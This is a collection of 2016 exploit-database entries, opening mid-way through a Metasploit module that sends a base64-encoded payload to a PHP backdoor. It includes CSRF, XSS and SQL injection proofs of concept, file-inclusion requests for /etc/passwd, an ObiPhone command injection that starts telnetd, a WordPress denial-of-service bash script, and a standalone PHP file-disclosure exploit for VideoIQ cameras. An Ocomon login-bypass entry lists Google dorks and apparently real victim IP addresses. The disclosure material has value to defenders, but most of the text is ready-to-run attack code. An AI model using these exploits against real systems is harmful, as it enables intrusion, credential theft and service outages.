  def exploit
    encoded = Rex::Text.encode_base64(payload.encoded)
    http_send_command("passthru(base64_decode(\"#{encoded}\"));")
  end

  def http_send_command(cmd)
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path),
      'vars_get' => {
        'bdr' => cmd
      }
    })
  end
end
HireHackking 
# Exploit Title: chatNow - Multiple Vulnerabilities
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://chatnow.thiagosf.net/
# Software Link: https://github.com/thiagosf/chatNow/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

1. CSRF(Send MSG)
2. Reflected XSS

========== CSRF VULNERABILITY
### Vulnerability
'send_message.php' is not check the csrf token or referer header.
It is possible CSRF Attack.

### Attack Code
<form name="csrf_poc" action="http://127.0.0.1/vul_test/chatNow/send_message.php" method="POST">
<input type="hidden" name="to_user" value="0">
<input type="hidden" name="scroll_page" value="on">
<input type="hidden" name="id_user" value="2">
<input type="hidden" name="message" value="CSRF">
<input type="hidden" name="reserved" value="false">

<input type="submit" value="Attack!">
</form>

<script type="text/javascript">document.forms.csrf_poc.submit();</script>


========== XSS VULNERABILITY
### Vulnerability
This page url is reflected data on page
It is vulnerable page because not filtered reflected url
		
### Attack code
http://127.0.0.1/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1

### Response
<div id="box_login">
		<h2>chatNow</h2>
	<form action="/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1" method="post">
		<div class="block_field">
			<label for="user">Nick</label>
			<input type="text" name="user" id="user" maxlength="20" /> 
		</div>
HireHackking 
# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]


### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96

question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit

3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>


### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter


### SQLMAP Result
#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer

...snip...

POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
---
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
---
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
HireHackking 
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos 
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion 

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);


This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.


Typical proof-of-concept would be to load passwd file:


http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
HireHackking 
# Exploit Title: Gnome Eye of Gnome Out-of-bounds-write
# Exploit Author: Kaslov Dmitri
# Vendor Homepage: https://wiki.gnome.org/Apps/EyeOfGnome
# Version: 3.10.2
# Tested on: Ubuntu 14.04 LTS
# CVE: CVE-2016-6855

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40291.zip


Reported: 19-August-2016
Fixed: 21-Agugst-2016 (fix will go into next software release)

GMarkup requires valid UTF8 input strings and would cause odd
looking messages if given invalid input. This could also trigger an
out-of-bounds write in glib before 2.44.1
HireHackking 
ObiHai ObiPhone - Multiple Vulnerabilities
------------------------------------------

Introduction
============
Multiple vulnerabilities were discovered in the web management
interface of the ObiHai ObiPhone products.  The Vulnerabilities were
discovered during a black box security assessment and therefore the
vulnerability list should not be considered exhaustive.

Affected Devices and Versions
=============================
ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview
======================
Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details
=====================

----------------------------------------------------------------------------
Obi-1. Memory corruption leading to free() of an attacker-controlled address
----------------------------------------------------------------------------

By providing a long URI (longer than 256 bytes) not containing a slash in a
request, a pointer is overwritten which is later passed to free().  By
controlling the location of the pointer, this would allow an attacker to affect
control flow and gain control of the application.  Note that the free() seems to
occur during cleanup of the request, as a 404 is returned to the user before the
segmentation fault.

  python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

  (gdb) bt
  #0  0x479d8b18 in free () from root/lib/libc.so.6
  #1  0x00135f20 in ?? ()
  (gdb) x/5i $pc
  => 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
    0x479d8b1c <free+52>:        sub     r5, r0, #8
    0x479d8b20 <free+56>:        tst     r3, #2
    0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
    0x479d8b28 <free+64>:        tst     r3, #4
  (gdb) i r r0
  r0             0x41     65

---------------------------------------
Obi-2. Command injection in WiFi Config
---------------------------------------

An authenticated user (including the lower-privileged "user" user) can enter a
hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet
daemon.

  GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
  Host: foo
  Authorization: [omitted]

Note that telnetd is now running and accessible via user "root" with no
password.

-----------------------------------------------
Obi-3. Denial of Service due to buffer overflow
-----------------------------------------------

By providing a long URI (longer than 256 bytes) beginning with a slash, memory
is overwritten beyond the end of mapped memory, leading to a crash.  Though no
exploitable behavior was observed, it is believed that memory containing
information relevant to the request or control flow is likely overwritten in the
process.  strcpy() appears to write past the end of the stack for the current
thread, but it does not appear that there are saved link registers on the stack
for the devices under test.

  python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

  (gdb) bt
  #0  0x479dc440 in strcpy () from root/lib/libc.so.6
  #1  0x001361c0 in ?? ()
  Backtrace stopped: previous frame identical to this frame (corrupt stack?)
  (gdb) x/5i $pc
  => 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
    0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
    0x479dc448 <strcpy+24>:      bx      lr
    0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
    0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
  (gdb) i r r1 r2
  r1             0xb434df01       3023363841
  r2             0xff     255
  (gdb) p/x $r1+$r2
  $1 = 0xb434e000

-------------------------------------------------
Obi-4. Buffer overflow in internal socket handler
-------------------------------------------------

Commands to be executed by realtime backend process `obid` are sent
via Unix domain sockets from obiapp.
In formatting the message for the Unix socket, a new string is constructed on
the stack.  This string can overflow the static buffer, leading to control of
program flow.  The only vectors leading to this code that were discovered during
the assessment were authenticated, however unauthenticated code paths may exist.
Note that the example command can be executed as the lower-privileged "user"
user.

  GET /wifi?checkssid=[A*1024] HTTP/1.1
  Host: foo
  Authorization: [omitted]

  (gdb)
  #0  0x41414140 in ?? ()
  #1  0x0006dc78 in ?? ()

---------------------------------
Obi-5. Cross-site request forgery
---------------------------------

All portions of the web interface appear to lack any protection against
Cross-Site Request Forgery.  Combined with the command injection vector in
ObiPhone-3, this would allow a remote attacker to execute arbitrary shell
commands on the phone, provided the current browser session was logged-in to the
phone.

----------------------------------------------
Obi-6. Failure to implement RFC 2617 correctly
----------------------------------------------

RFC 2617 specifies HTTP digest authentication, but is not correctly implemented
on the ObiPhone.  The HTTP digest authentication fails to comply in the
following ways:

- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go
  backwards

  GET / HTTP/1.1
  Host: foo
  Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
  algorithm=MD5, response="309091eb609a937358a848ff817b231c",
opaque="", qop=auth,
  nc=00000001, cnonce="a"
  Connection: close

  HTTP/1.1 200 OK
  Server: OBi110
  Cache-Control:must-revalidate, no-store, no-cache
  Content-Type: text/html
  Content-Length: 1108
  Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen
and the response generated offline.

--------------------------------------------------------
Obi-7. Invalid pointer dereference due to invalid header
--------------------------------------------------------

Sending an invalid HTTP Authorization header, such as
"Authorization: foo", causes the program to attempt to read from an invalid
memory address, leading to a segmentation fault and reboot of the device.  This
requires no authentication, only access to the network to which the device is
connected.

  GET / HTTP/1.1
  Host: foo
  Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably
returned as a -1 error code.

  (gdb) bt
  #0  0x479dc438 in strcpy () from root/lib/libc.so.6
  #1  0x00134ae0 in ?? ()
  (gdb) x/5i $pc
  => 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
    0x479dc43c <strcpy+12>:      cmp     r3, #0
    0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
    0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
    0x479dc448 <strcpy+24>:      bx      lr
  (gdb) i r r1
  r1             0xffffffff       4294967295

----------------------------------------------------
Obi-8. Null pointer dereference due to malicious URL
----------------------------------------------------

If the /obihai-xml handler is requested without any trailing slash or component,
this leads to a null pointer dereference, crash, and subsequent reboot of the
phone.  This requires no authentication, only access to the network to which the
device is connected.

  GET /obihai-xml HTTP/1.1
  Host: foo

  (gdb) bt
  #0  0x479dc7f4 in strlen () from root/lib/libc.so.6
  Backtrace stopped: Cannot access memory at address 0x8f6
  (gdb) info frame
  Stack level 0, frame at 0xbef1aa50:
  pc = 0x479dc7f4 in strlen; saved pc = 0x171830
  Outermost frame: Cannot access memory at address 0x8f6
  Arglist at 0xbef1aa50, args:
  Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
  (gdb) x/5i $pc
  => 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
    0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
    0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
    0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
    0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
  (gdb) i r r1
  r1             0x0      0

------------------------------------------------------
Obi-9. Denial of service due to invalid content-length
------------------------------------------------------

Content-Length headers of -1, -2, or -3 result in a crash and device reboot.
This does not appear exploitable to gain execution.  Larger (more negative)
values return a page stating "Firmware Update Failed" though it does not appear
any attempt to update the firmware with the posted data occurred.

  POST / HTTP/1.1
  Host: foo
  Content-Length: -1

  Foo

This appears to write a constant value of 0 to an address controlled by the
Content-Length parameter, but since it appears to be relative to a freshly
mapped page of memory (perhaps via mmap() or malloc()), it does not appear this
can be used to gain control of the application.

  (gdb) bt
  #0  0x00138250 in HTTPD_msg_proc ()
  #1  0x00070138 in ?? ()
  (gdb) x/5i $pc
  => 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
    0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
    0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
    0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
    0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
  (gdb) i r r3 r2
  r3             0xafcc7000       2949410816
  r2             0xffffffff       4294967295

Mitigation
==========
Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author
======
The issues were discovered by David Tomaschik of the Google Security Team.

Timeline
========
- 2016/05/12 - Reported to ObiHai
- 2016/05/12 - Findings Acknowledged by ObiHai
- 2016/05/20 - ObiHai reports working on patches for most issues
- 2016/06/?? - New Firmware posted to ObiHai Website
- 2016/08/18 - Public Disclosure
HireHackking 
Sakai 10.7 Multiple Vulnerabilities


Vendor: Apereo Foundation
Product web page: https://www.sakaiproject.org
Affected version: 10.7 (Kernel 10.7)

Summary: Sakai is a free, community source, educational software
platform designed to support teaching, research and collaboration.
Systems of this type are also known as Course Management Systems (CMS),
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).

Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site. Also there is a file disclosure vulnerability when calling
custom tool script. It is not properly verified before being used to read files.
This can be exploited to disclose contents of files from local resources.

Tested on: Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5358
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php

Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)
        https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)
        https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)
        https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)
        


29.06.2016

--


XSS when using file upload (filename parameter):
------------------------------------------------

POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

------WebKitFormBoundaryViazQNB5ok9E64l2
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream

testingus
------WebKitFormBoundaryViazQNB5ok9E64l2--


Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=EmulateIE11
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 383
Date: Wed, 29 Jun 2016 11:45:49 GMT
Connection: close

<script type="text/javascript">
(function(){ var d = document.domain ; while ( true ) {
try { var test = parent.document.domain ; break ; } catch( e ) {}
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;
try { document.domain = d ; } catch (e) { break ; }}})() ;
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');
</script>




XSS when creating a job (After creating a job, click on "Triggers" link):
-------------------------------------------------------------------------

GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1
Host: localhost:8080



XSS in URI:
-----------

GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1
Host: localhost:8080


LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics.
Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting:
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):
----------------------------------------

GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
HireHackking 
Path traversal vulnerability in WordPress Core Ajax handlers

Abstract

A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160712-0036

See also

- CVE-2016-6896
- CVE-2016-6897
- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin()

Tested versions

This issue was successfully tested on the WordPress version 4.5.3.

Fix

WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s).

Introduction

WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.

Details

The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). 

The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.

Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case.

Proof of concept

The following Bash script can be used to trigger the denial of service condition.

#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
   
# login
curl --cookie-jar "$cookiejar" \
   --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
   "$target/wp-login.php" \
   >/dev/null 2>&1
   
# exhaust apache
for i in `seq 1 1000`
   do
      curl --cookie "$cookiejar" \
      --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
      "$target/wp-admin/admin-ajax.php" \
      >/dev/null 2>&1 &
done
   
rm "$cookiejar"
HireHackking 
# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql
Injection
# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
# Date: 2016.08.18
# Exploit Author: Jonatas Fil a.k.a pwx
# Vendor Homepage: ninj4c0d3r.github.io
# Version: Latest 2.0RC6
# Tested on: Linux And Windows
# CVE : CVE-2005-4664


\xDetails:
========================================
[Software]
- Ocomon

[Bug Summary]
- Multiple SQL Injection (SQLi)

[Impact]
- High

[Affected Version]
- Latest 2.0RC6
- Prior versions may also be affected
=========================================



\x01- Search by dork in google

Dorks:
inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6


\x02 - After, To find the victim, open the inspect element in admin page.

\x03 - Look for the parameter: <body>: <table>: <tbody>: <tr>, and return
valida() and delete the content, leaving blank.

\x04 - After, Sign in using: "admin'or'" For Username and Password.

\x05 - Finish!, You get acess in administrative page to the system.


--------------------------------------------
\xDEMO:

http://200.66.111.38/ocomon/index.php
http://191.241.229.210:8080/ocomon/index.php
http://191.241.229.210:8081/ocomon/index.php
---------------------------------------------

References:

https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html
http://www.cvedetails.com/cve/CVE-2005-4664/
https://www.securityfocus.com/bid/15386/exploit
HireHackking 
<?php
# VideoIQ Camera Remote File Disclosure 0day Exploit
# 
# VideoIQ develops intelligent video surveillance cameras using edge video IP security cameras paired with video analytics.
#
# Exploit Coded & Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman) 

# Date 20/08/2016
# Shodan Dork 		: title:"VideoIQ Camera Login"
# Version Affected 	: All Versions
# Vendor Homepage	: http://avigilon.com
# CVE				: N/A
# Description		: VideoIQ is vulnerable to remote file disclosure which allows to any unauthenticated user read any file system including file configurations.
###
# Exploit code:

error_reporting(0);

$error[0] = "[!] This script is intended to be launched from the cli.";
 
if(php_sapi_name() <> "cli")
	die($error[0]);
     
if($argc < 3) {
	echo("\nUsage  : php {$argv[0]} <host> <port>");
	echo("\nExample: php {$argv[0]} localhost 8080");
	die();
}

if(isset($argv[1]) && isset($argv[2])) {
	$host = $argv[1];
	$port = $argv[2];
}

$pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{FILE_PATH} HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Connection: close\r\n\r\n";

while(1) {
	if(strstr(http_send($host, $port, preg_replace("/{FILE_PATH}/", '/etc/passwd', $pack)), 'root')) {
		echo("\nAnonymous@{$host}:~# cat ");
		if(($file = trim(fgets(STDIN))) == "exit")
			break;
		$ret = http_send($host, $port, preg_replace("/{FILE_PATH}/", $file, $pack));
		if(strstr($ret, '<title>Error 404 NOT_FOUND</title>') || strstr($ret, '<p>Problem accessing') || strstr($ret, '<h2>HTTP ERROR 404</h2>')) {
			echo("cat: {$file}: No such file or directory");
		} else {
			echo($ret);
		}
	} else {
		echo("[-] Server likely not vulnerable.\n");
		break;
	}
}

function http_send($host, $port, $pack) {
	if(!($sock = fsockopen($host, $port)))
		die("\n[-] No response from {$host}\n");
	fwrite($sock, $pack);
	$response = explode("\r\n\r\n", stream_get_contents($sock));
	return($response[1]);
}
?>
HireHackking 
1. Advisory Information
========================================
Title                   : Honeywell IP-Camera (HICC-1100PT) Local File Inclusion
Vendor Homepage         : https://www.asia.security.honeywell.com
Remotely Exploitable	: Yes
Tested on Camera types	: HICC-1100PT
Reference               : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability           : Local File Inclusion (Critical/High)
Shodan Dork             : html:"Honeywell IP-Camera"
Date                    : 20/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)


2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.


3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.

4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd

Or config.ini file:

http://host:port/cgi-bin/check.cgi?file=config.ini


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.